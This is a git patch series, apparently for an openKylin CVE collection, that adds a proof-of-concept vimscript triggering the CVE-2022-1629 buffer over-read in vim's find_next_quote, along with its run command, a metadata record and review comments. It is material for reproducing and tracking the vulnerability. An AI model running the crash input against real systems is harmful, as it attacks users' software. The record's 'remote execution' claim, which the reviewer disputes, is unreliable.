From b541355c212947f6e7cc3cef710a02b37d9f9102 Mon Sep 17 00:00:00 2001
From: fionnoif
Date: Wed, 15 Mar 2023 19:30:42 +0800
Subject: [PATCH 1/2] ADD CVE_2022_1629

---
 cve/vim/2022/CVE-2022-1629/README.md | 14 ++++++++++++++
 cve/vim/2022/CVE-2022-1629/poc_h4_s.dat | 6 ++++++
 cve/vim/2022/yaml/CVE-2022-1629.yaml | 20 ++++++++++++++++++++
 openkylin_list.yaml | 1 +
 4 files changed, 41 insertions(+)
 create mode 100644 cve/vim/2022/CVE-2022-1629/README.md
 create mode 100644 cve/vim/2022/CVE-2022-1629/poc_h4_s.dat
 create mode 100644 cve/vim/2022/yaml/CVE-2022-1629.yaml

diff --git a/cve/vim/2022/CVE-2022-1629/README.md b/cve/vim/2022/CVE-2022-1629/README.md
new file mode 100644
index 00000000..bc146eac
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-1629/README.md
@@ -0,0 +1,14 @@
+
+# CVE-2022-1629 Proof-of-Concept
+
+### Overview
+
+Buffer Over-read in function find_next_quote in GitHub repository vim/vim prior to 8.2.4925. This vulnerabilities are capable of crashing software, Modify Memory, and possible remote execution
+For a comprehensive understanding, check out the accompanying [blog post](https://nvd.nist.gov/vuln/detail/cve-2022-1629) for in-depth details.
+
+### Usage
+
+Run the PoC:
+```
+vim -u NONE -X -Z -e -s -S ./poc_h4_s.dat -c :qa!
+```
diff --git a/cve/vim/2022/CVE-2022-1629/poc_h4_s.dat b/cve/vim/2022/CVE-2022-1629/poc_h4_s.dat
new file mode 100644
index 00000000..79ba5fe9
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-1629/poc_h4_s.dat
@@ -0,0 +1,6 @@
+se encoding=iso8859
+fu R()
+sil!normi"\
+cal R()
+endf
+cal R()
\ No newline at end of file
diff --git a/cve/vim/2022/yaml/CVE-2022-1629.yaml b/cve/vim/2022/yaml/CVE-2022-1629.yaml
new file mode 100644
index 00000000..a5df9b27
--- /dev/null
+++ b/cve/vim/2022/yaml/CVE-2022-1629.yaml
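Review bot: The PoC script gives no way to tell a successful trigger from a silent no-op: with the README's `-e -s ... -c :qa!` invocation a patched or non-instrumented vim simply exits, and an over-read of this kind is typically only visible under AddressSanitizer, so the expected observable and the build it was verified against belong in the script itself. I would add a header comment such as `" CVE-2022-1629: on vim < 8.2.4925 built with ASan, expect a heap-buffer-overflow READ reported in find_next_quote; a release build may show nothing` (vimscript comments start with `"`). The function also recurses with no base case (`cal R()` inside `fu R()`), so it presumably relies on vim's function-depth limit to stop rather than on the bug itself, and the reason for `se encoding=iso8859` and the trailing backslash in `sil!normi"\` is not stated; one comment line each on why they are needed would make the file maintainable.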
@@ -0,0 +1,20 @@
+id: CVE-2022-1629
+source: https://huntr.dev/bounties/e26d08d4-1886-41f0-9af4-f3e1bf3d52ee/
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: Medium
+ description: |
+ Vim 8.2.4925之前版本存在安全漏洞,该漏洞源于find_next_quote函数的缓冲区过度读取,从而导致软件崩溃、修改内存和远程执行。
+ scope-of-influence:
+ vim< 8.2.4925
+ reference:
+ - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-1629
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-1629
+ classification:
+ cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H
+ cvss-score: 6.6
+ cve-id: CVE-2022-1629
+ cwe-id: CWE-126
+ cnvd-id: None
+ kve-id: None
+ tags: 缓冲区错误
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 323454b7..332b6270 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -37,6 +37,7 @@ cve:
 - CVE-2022-0685
 - CVE-2022-0714
 - CVE-2022-0729
+ - CVE-2022-1629
 - CVE-2022-1771
 - CVE-2022-2206
 - CVE-2022-2257
-- 
Gitee

From 38efd15bf3bc694d06c6610d4a4fafb2f121a83d Mon Sep 17 00:00:00 2001
From: Fionnoif
Date: Thu, 16 Mar 2023 01:56:07 +0000
Subject: [PATCH 2/2] update cve/vim/2022/yaml/CVE-2022-1629.yaml.

Signed-off-by: Fionnoif
---
 cve/vim/2022/yaml/CVE-2022-1629.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/cve/vim/2022/yaml/CVE-2022-1629.yaml b/cve/vim/2022/yaml/CVE-2022-1629.yaml
index a5df9b27..6949cdb3 100644
--- a/cve/vim/2022/yaml/CVE-2022-1629.yaml
+++ b/cve/vim/2022/yaml/CVE-2022-1629.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-1629
 source: https://huntr.dev/bounties/e26d08d4-1886-41f0-9af4-f3e1bf3d52ee/
 info:
 name: Vim是一款基于UNIX平台的编辑器。
- severity: Medium
+ severity: High
 description: |
 Vim 8.2.4925之前版本存在安全漏洞,该漏洞源于find_next_quote函数的缓冲区过度读取,从而导致软件崩溃、修改内存和远程执行。
 scope-of-influence:
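Review bot: The new `description` states that the flaw leads to 远程执行 (remote code execution), yet the same record classifies it as a buffer over-read (`cwe-id: CWE-126`) with a local attack vector (`cvss-metrics: CVSS:3.0/AV:L/...`), so the record contradicts itself. An over-read is a crash or information-disclosure primitive; the remote-execution phrase appears to be copied from the NVD/CNNVD summary (the README in this same patch repeats it) rather than derived from the bug, and should be toned down, e.g. `从而导致软件崩溃或越界读取;远程代码执行未经证实。` The `cnvd-id: None` and `kve-id: None` values are also YAML strings, not nulls; if the consumer of these records treats absent identifiers as null, `null` or `~` would be the correct spelling (cannot confirm the consumer from here).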
@@ -11,8 +11,8 @@ info:
 - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-1629
 - https://nvd.nist.gov/vuln/detail/CVE-2022-1629
 classification:
- cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H
- cvss-score: 6.6
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
 cve-id: CVE-2022-1629
 cwe-id: CWE-126
 cnvd-id: None
-- 
Gitee
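Review bot: The rescored vector `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H` with `cvss-score: 7.8` no longer matches the rating of the huntr bounty that the record still names as `source:`, and nothing in the file says which authority the classification now follows (it appears to be the NVD entry listed under `reference`, but that is an inference). A one-line comment above `cvss-metrics`, e.g. `# scored per NVD; the huntr source report rated it 6.6/Medium`, would keep the provenance clear for anyone reconciling the two. Note also that `AV:L` together with `UI:R` means a local user must open crafted input, which sits oddly with the 远程执行 wording kept in the `description` earlier in this file.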